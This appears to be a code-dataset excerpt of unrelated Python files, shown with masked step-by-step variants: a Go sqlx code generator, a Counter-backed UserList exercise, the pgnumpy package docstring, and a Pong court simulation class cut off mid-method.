go.write("}\n\n")
#db struct
go.write("type {0}Repo struct {1}\n".format(dictiony["dbname"], "{"))
go.write(" db *sqlx.DB\n}\n\n")
#interface
go.write("type {0}I interface {1}\n".format(dictiony["dbname"], "{"))
go.write(" Create(*{0}) (string, error)\n{1}\n\n".format(dictiony["dbname"], "}"))
#newIndCountrAgent
go.write("func New{0}(db *sqlx.DB) {1} {2}\n".format(dictiony["dbname"],dictiony["interface"], "{"))
go.write(" return &{0}Repo{1}\n".format(dictiony["dbname"], "{"))
go.write(" db: db,\n {0}\n{1}\n\n".format("}", "}"))
#create
go.write("func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\n".format(dictiony["dbname"], "{", dictiony["dbname"]))
go.write(" query := `INSERT INTO {} (\n".format(dictiony["dbname"]))
go.write(" id, \n name,\n phonenumber,\n address,\n")
go.write(" description)\n values($1, $2, $3, $4, $5);`\n")
go.write(" prp, err := ica.db.Prepare(query)\n\n ")
go.write(' if err != nil ')
go.write("{\n")
go.write(' return "", err\n')
go.write(" }\n")
go.write(" _, err = prp.Exec(\n")
go.write(" agent.ID,\n agent.Name,\n")
go.write(" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n")
go.write(" if err != nil {\n ")
go.write('return "", err\n }\n\n')
go.write(" return agent.ID, err\n}")
#get
|
flexible
|
{
"blob_id": "e99e558ebf5938a90f00df6593c9f75a18affcb8",
"index": 9127,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngo.write('package main\\n\\n')\ngo.write('import (\\n ')\ngo.write(\"\"\"\"github.com/jmoiron/sqlx\"\n)\n\n\"\"\")\ngo.write('type {0} struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(' ID {}\\n'.format(dictiony['uuid']))\ngo.write(' Name {}\\n'.format(dictiony['varchar']))\ngo.write(' PhoneNumber {}\\n'.format(dictiony['varchar']))\ngo.write(' Address {}\\n'.format(dictiony['varchar']))\ngo.write(' Description {}\\n'.format(dictiony['varchar']))\ngo.write('}\\n\\n')\ngo.write('type {0}Repo struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db *sqlx.DB\n}\n\n\"\"\")\ngo.write('type {0}I interface {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" Create(*{0}) (string, error)\n{1}\n\n\"\"\".format(dictiony[\n 'dbname'], '}'))\ngo.write('func New{0}(db *sqlx.DB) {1} {2}\\n'.format(dictiony['dbname'],\n dictiony['interface'], '{'))\ngo.write(' return &{0}Repo{1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db: db,\n {0}\n{1}\n\n\"\"\".format('}', '}'))\ngo.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n'.\n format(dictiony['dbname'], '{', dictiony['dbname']))\ngo.write(' query := `INSERT INTO {} (\\n'.format(dictiony['dbname']))\ngo.write(\n \"\"\" id, \n name,\n phonenumber,\n address,\n\"\"\")\ngo.write(\"\"\" description)\n values($1, $2, $3, $4, $5);`\n\"\"\")\ngo.write(' prp, err := ica.db.Prepare(query)\\n\\n ')\ngo.write(' if err != nil ')\ngo.write('{\\n')\ngo.write(' return \"\", err\\n')\ngo.write(' }\\n')\ngo.write(' _, err = prp.Exec(\\n')\ngo.write(\"\"\" agent.ID,\n agent.Name,\n\"\"\")\ngo.write(\n \"\"\" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n\"\"\"\n )\ngo.write(' if err != nil {\\n ')\ngo.write(\"\"\"return \"\", err\n }\n\n\"\"\")\ngo.write(\"\"\" return agent.ID, err\n}\"\"\")\n",
"step-3": "<mask token>\nf = open('parse.sql')\ngo = open('struct.go', 'w+')\ndictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',\n 'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',\n 'interface': 'IndividualContrAgentI', 'ica': 'ica'}\ngo.write('package main\\n\\n')\ngo.write('import (\\n ')\ngo.write(\"\"\"\"github.com/jmoiron/sqlx\"\n)\n\n\"\"\")\ngo.write('type {0} struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(' ID {}\\n'.format(dictiony['uuid']))\ngo.write(' Name {}\\n'.format(dictiony['varchar']))\ngo.write(' PhoneNumber {}\\n'.format(dictiony['varchar']))\ngo.write(' Address {}\\n'.format(dictiony['varchar']))\ngo.write(' Description {}\\n'.format(dictiony['varchar']))\ngo.write('}\\n\\n')\ngo.write('type {0}Repo struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db *sqlx.DB\n}\n\n\"\"\")\ngo.write('type {0}I interface {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" Create(*{0}) (string, error)\n{1}\n\n\"\"\".format(dictiony[\n 'dbname'], '}'))\ngo.write('func New{0}(db *sqlx.DB) {1} {2}\\n'.format(dictiony['dbname'],\n dictiony['interface'], '{'))\ngo.write(' return &{0}Repo{1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db: db,\n {0}\n{1}\n\n\"\"\".format('}', '}'))\ngo.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n'.\n format(dictiony['dbname'], '{', dictiony['dbname']))\ngo.write(' query := `INSERT INTO {} (\\n'.format(dictiony['dbname']))\ngo.write(\n \"\"\" id, \n name,\n phonenumber,\n address,\n\"\"\")\ngo.write(\"\"\" description)\n values($1, $2, $3, $4, $5);`\n\"\"\")\ngo.write(' prp, err := ica.db.Prepare(query)\\n\\n ')\ngo.write(' if err != nil ')\ngo.write('{\\n')\ngo.write(' return \"\", err\\n')\ngo.write(' }\\n')\ngo.write(' _, err = prp.Exec(\\n')\ngo.write(\"\"\" agent.ID,\n agent.Name,\n\"\"\")\ngo.write(\n \"\"\" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n\"\"\"\n )\ngo.write(' if err != nil {\\n ')\ngo.write(\"\"\"return \"\", err\n }\n\n\"\"\")\ngo.write(\"\"\" return agent.ID, err\n}\"\"\")\n",
"step-4": "import sqlparse\nf = open('parse.sql')\ngo = open('struct.go', 'w+')\ndictiony = {'uuid': 'string', 'varchar': 'string', 'timestamp': 'time.Time',\n 'int': 'int', 'text': 'string', 'dbname': 'IndividualContrAgent',\n 'interface': 'IndividualContrAgentI', 'ica': 'ica'}\ngo.write('package main\\n\\n')\ngo.write('import (\\n ')\ngo.write(\"\"\"\"github.com/jmoiron/sqlx\"\n)\n\n\"\"\")\ngo.write('type {0} struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(' ID {}\\n'.format(dictiony['uuid']))\ngo.write(' Name {}\\n'.format(dictiony['varchar']))\ngo.write(' PhoneNumber {}\\n'.format(dictiony['varchar']))\ngo.write(' Address {}\\n'.format(dictiony['varchar']))\ngo.write(' Description {}\\n'.format(dictiony['varchar']))\ngo.write('}\\n\\n')\ngo.write('type {0}Repo struct {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db *sqlx.DB\n}\n\n\"\"\")\ngo.write('type {0}I interface {1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" Create(*{0}) (string, error)\n{1}\n\n\"\"\".format(dictiony[\n 'dbname'], '}'))\ngo.write('func New{0}(db *sqlx.DB) {1} {2}\\n'.format(dictiony['dbname'],\n dictiony['interface'], '{'))\ngo.write(' return &{0}Repo{1}\\n'.format(dictiony['dbname'], '{'))\ngo.write(\"\"\" db: db,\n {0}\n{1}\n\n\"\"\".format('}', '}'))\ngo.write('func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n'.\n format(dictiony['dbname'], '{', dictiony['dbname']))\ngo.write(' query := `INSERT INTO {} (\\n'.format(dictiony['dbname']))\ngo.write(\n \"\"\" id, \n name,\n phonenumber,\n address,\n\"\"\")\ngo.write(\"\"\" description)\n values($1, $2, $3, $4, $5);`\n\"\"\")\ngo.write(' prp, err := ica.db.Prepare(query)\\n\\n ')\ngo.write(' if err != nil ')\ngo.write('{\\n')\ngo.write(' return \"\", err\\n')\ngo.write(' }\\n')\ngo.write(' _, err = prp.Exec(\\n')\ngo.write(\"\"\" agent.ID,\n agent.Name,\n\"\"\")\ngo.write(\n \"\"\" agent.PhoneNumber,\n agent.Address,\n agent.Description,\n )\n\"\"\"\n )\ngo.write(' if err != nil {\\n ')\ngo.write(\"\"\"return \"\", err\n }\n\n\"\"\")\ngo.write(\"\"\" return agent.ID, err\n}\"\"\")\n",
"step-5": "import sqlparse\n\nf = open(\"parse.sql\")\ngo = open(\"struct.go\", \"w+\")\ndictiony = {\n \"uuid\": \"string\",\n \"varchar\": \"string\",\n \"timestamp\": \"time.Time\",\n \"int\": \"int\",\n \"text\": \"string\",\n \"dbname\": \"IndividualContrAgent\",\n \"interface\": \"IndividualContrAgentI\",\n \"ica\":\"ica\"\n}\n#package\ngo.write(\"package main\\n\\n\")\n\n#import\ngo.write(\"import (\\n \")\ngo.write('\"github.com/jmoiron/sqlx\"\\n)\\n\\n')\n\n#struct\ngo.write(\"type {0} struct {1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" ID {}\\n\".format(dictiony[\"uuid\"]))\ngo.write(\" Name {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\" PhoneNumber {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\" Address {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\" Description {}\\n\".format(dictiony[\"varchar\"]))\ngo.write(\"}\\n\\n\")\n\n#db struct\ngo.write(\"type {0}Repo struct {1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" db *sqlx.DB\\n}\\n\\n\")\n\n#interface\ngo.write(\"type {0}I interface {1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" Create(*{0}) (string, error)\\n{1}\\n\\n\".format(dictiony[\"dbname\"], \"}\"))\n\n#newIndCountrAgent\ngo.write(\"func New{0}(db *sqlx.DB) {1} {2}\\n\".format(dictiony[\"dbname\"],dictiony[\"interface\"], \"{\"))\ngo.write(\" return &{0}Repo{1}\\n\".format(dictiony[\"dbname\"], \"{\"))\ngo.write(\" db: db,\\n {0}\\n{1}\\n\\n\".format(\"}\", \"}\"))\n\n#create\ngo.write(\"func(ica *{2}Repo) Create(agent {0}) (string, error) {1}\\n\".format(dictiony[\"dbname\"], \"{\", dictiony[\"dbname\"]))\ngo.write(\" query := `INSERT INTO {} (\\n\".format(dictiony[\"dbname\"]))\ngo.write(\" id, \\n name,\\n phonenumber,\\n address,\\n\")\ngo.write(\" description)\\n values($1, $2, $3, $4, $5);`\\n\")\ngo.write(\" prp, err := ica.db.Prepare(query)\\n\\n \")\ngo.write(' if err != nil ')\ngo.write(\"{\\n\")\ngo.write(' return \"\", err\\n')\ngo.write(\" }\\n\")\ngo.write(\" _, err = prp.Exec(\\n\")\ngo.write(\" agent.ID,\\n agent.Name,\\n\")\ngo.write(\" agent.PhoneNumber,\\n agent.Address,\\n agent.Description,\\n )\\n\")\ngo.write(\" if err != nil {\\n \")\ngo.write('return \"\", err\\n }\\n\\n')\ngo.write(\" return agent.ID, err\\n}\")\n\n#get\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Counted List
Create a class for an list like object based on UserList wrapper
https://docs.python.org/3/library/collections.html#collections.UserList
That object should have a method to return a Counter
https://docs.python.org/3/library/collections.html#collections.Counter
for all objects in the list
Counter should be updated automatically for at lest 2 methods (append, pop)
"""
# example to test code
# class Example(UserList)
# ...
#
# x = Example(['1', '2', '3'])
# y = x.get_counter() # y contains Counter({'1':1, '2':1 '3':1})
# x.append(3)
# now y contains Counter({'1':1, '2':1 '3':2})
from collections import UserList,Counter
class CountedList(UserList):
def Count(self):
self.cnt=Counter(self.data)
return self.cnt
def append(self, item):
super(CountedList,self).append(item)
global y
y = self.Count()
countedlist=CountedList(['1', '2', '3'])
y=countedlist.Count()
print(y)
countedlist.append('3')
print(y)
|
normal
|
{
"blob_id": "1cf4fc37e030a895cb36f537ce9e92df34acfb8b",
"index": 7659,
"step-1": "<mask token>\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\n<mask token>\nprint(y)\ncountedlist.append('3')\nprint(y)\n",
"step-3": "<mask token>\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\ncountedlist = CountedList(['1', '2', '3'])\ny = countedlist.Count()\nprint(y)\ncountedlist.append('3')\nprint(y)\n",
"step-4": "<mask token>\nfrom collections import UserList, Counter\n\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt = Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList, self).append(item)\n global y\n y = self.Count()\n\n\ncountedlist = CountedList(['1', '2', '3'])\ny = countedlist.Count()\nprint(y)\ncountedlist.append('3')\nprint(y)\n",
"step-5": "\"\"\"\nCounted List\nCreate a class for an list like object based on UserList wrapper\nhttps://docs.python.org/3/library/collections.html#collections.UserList\nThat object should have a method to return a Counter\nhttps://docs.python.org/3/library/collections.html#collections.Counter\nfor all objects in the list\nCounter should be updated automatically for at lest 2 methods (append, pop)\n\"\"\"\n\n# example to test code\n# class Example(UserList)\n# ...\n#\n# x = Example(['1', '2', '3'])\n# y = x.get_counter() # y contains Counter({'1':1, '2':1 '3':1})\n# x.append(3)\n# now y contains Counter({'1':1, '2':1 '3':2})\n\nfrom collections import UserList,Counter\n\nclass CountedList(UserList):\n\n def Count(self):\n self.cnt=Counter(self.data)\n return self.cnt\n\n def append(self, item):\n super(CountedList,self).append(item)\n global y\n y = self.Count()\n\ncountedlist=CountedList(['1', '2', '3'])\ny=countedlist.Count()\nprint(y)\n\ncountedlist.append('3')\nprint(y)\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
name = 'valentina '
print(name * 1000)
|
normal
|
{
"blob_id": "aff1a9263e183610f403a4d6a7f27b45eacb7ff2",
"index": 0,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(name * 1000)\n",
"step-3": "name = 'valentina '\nprint(name * 1000)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""
Package:
pgnumpy
Description
A class and a set of functions for interacting with a PostgreSql database.
A C++ extension module allows returning results as a NumPy array. Numpy
arrays can also be written to tables.
The workhorse class is called PgNumpy
This class has limited functionality compared to the full Python database
api specification. It can execute arbitrary queries and extract results
into numpy arrays. However, cursors are not yet supported. For getting
results, only the fetchall() command is available, as the goal is always to
extract all rows into a single numpy structure rather than work row by row.
More generic DB-API compliant packges like psycopg are more suitable when
more flexible operations are needed.
Classes:
PgNumpy:
The class used in all database interactions. This class represents a
database connection and facilitates executing queries and extracting
results. See docs for pgnumpy.PgNumpy for more details.
PgInput:
A class for writing input files for use in a COPY into the database.
ArrayWriter:
Write arrays to a file for input to postgres. This slower version can
be used if recfile is not available.
ArrayStringifier:
Make a string from an array, possibly with brackets indicating
dimensions.
Convenience Functions:
connect:
Create a database connection, returning a PgNumpy object. If conninfo
is None or "" then the "default" connection based on the PGUSER and
PGDATABASE environment variables is used.
array2table:
Write array with fields (a structure) to a postgres table. If the
table does not yet exist it is created with column definitions based on
the input array. If it does exist the data are appended as new rows in
the table.
"""
import pgnumpy
import cpgnumpy
from pgnumpy import connect
from pgnumpy import PgNumpy
from pgnumpy import PgInput
from pgnumpy import ArrayWriter
from pgnumpy import ArrayStringifier
from pgnumpy import array2table
#from pgnumpy import tables
#from pgnumpy import table_exists
#from pgnumpy import describe
from pgnumpy import test
from pgnumpy import test_simple
#from pgnumpy import obliterate
#from pgnumpy import compare_arrays
# attempt to import the connect method from psycopg2
try:
from psycopg2 import connect
except:
pass
|
normal
|
{
"blob_id": "7e5cf782692d9cfb2718b2efcc83efa2ecb815cd",
"index": 1371,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n from psycopg2 import connect\nexcept:\n pass\n",
"step-3": "<mask token>\nimport pgnumpy\nimport cpgnumpy\nfrom pgnumpy import connect\nfrom pgnumpy import PgNumpy\nfrom pgnumpy import PgInput\nfrom pgnumpy import ArrayWriter\nfrom pgnumpy import ArrayStringifier\nfrom pgnumpy import array2table\nfrom pgnumpy import test\nfrom pgnumpy import test_simple\ntry:\n from psycopg2 import connect\nexcept:\n pass\n",
"step-4": "\"\"\"\nPackage:\n pgnumpy\nDescription\n\n A class and a set of functions for interacting with a PostgreSql database.\n A C++ extension module allows returning results as a NumPy array. Numpy\n arrays can also be written to tables. \n \n The workhorse class is called PgNumpy\n\n This class has limited functionality compared to the full Python database\n api specification. It can execute arbitrary queries and extract results\n into numpy arrays. However, cursors are not yet supported. For getting\n results, only the fetchall() command is available, as the goal is always to\n extract all rows into a single numpy structure rather than work row by row.\n \n More generic DB-API compliant packges like psycopg are more suitable when\n more flexible operations are needed.\n\nClasses:\n PgNumpy: \n The class used in all database interactions. This class represents a\n database connection and facilitates executing queries and extracting\n results. See docs for pgnumpy.PgNumpy for more details.\n PgInput: \n A class for writing input files for use in a COPY into the database.\n ArrayWriter: \n Write arrays to a file for input to postgres. This slower version can\n be used if recfile is not available.\n ArrayStringifier: \n Make a string from an array, possibly with brackets indicating\n dimensions.\n\n\nConvenience Functions:\n\n connect:\n Create a database connection, returning a PgNumpy object. If conninfo\n is None or \"\" then the \"default\" connection based on the PGUSER and\n PGDATABASE environment variables is used.\n\n array2table:\n Write array with fields (a structure) to a postgres table. If the\n table does not yet exist it is created with column definitions based on\n the input array. If it does exist the data are appended as new rows in\n the table. \n\n\"\"\"\n\nimport pgnumpy\nimport cpgnumpy\n\nfrom pgnumpy import connect\nfrom pgnumpy import PgNumpy\nfrom pgnumpy import PgInput\nfrom pgnumpy import ArrayWriter\nfrom pgnumpy import ArrayStringifier\nfrom pgnumpy import array2table\n\n#from pgnumpy import tables\n#from pgnumpy import table_exists\n#from pgnumpy import describe\nfrom pgnumpy import test\nfrom pgnumpy import test_simple\n#from pgnumpy import obliterate\n#from pgnumpy import compare_arrays\n\n# attempt to import the connect method from psycopg2\ntry:\n from psycopg2 import connect\nexcept:\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class court:
<|reserved_special_token_0|>
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
<|reserved_special_token_0|>
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
<|reserved_special_token_0|>
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class court:
<|reserved_special_token_0|>
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
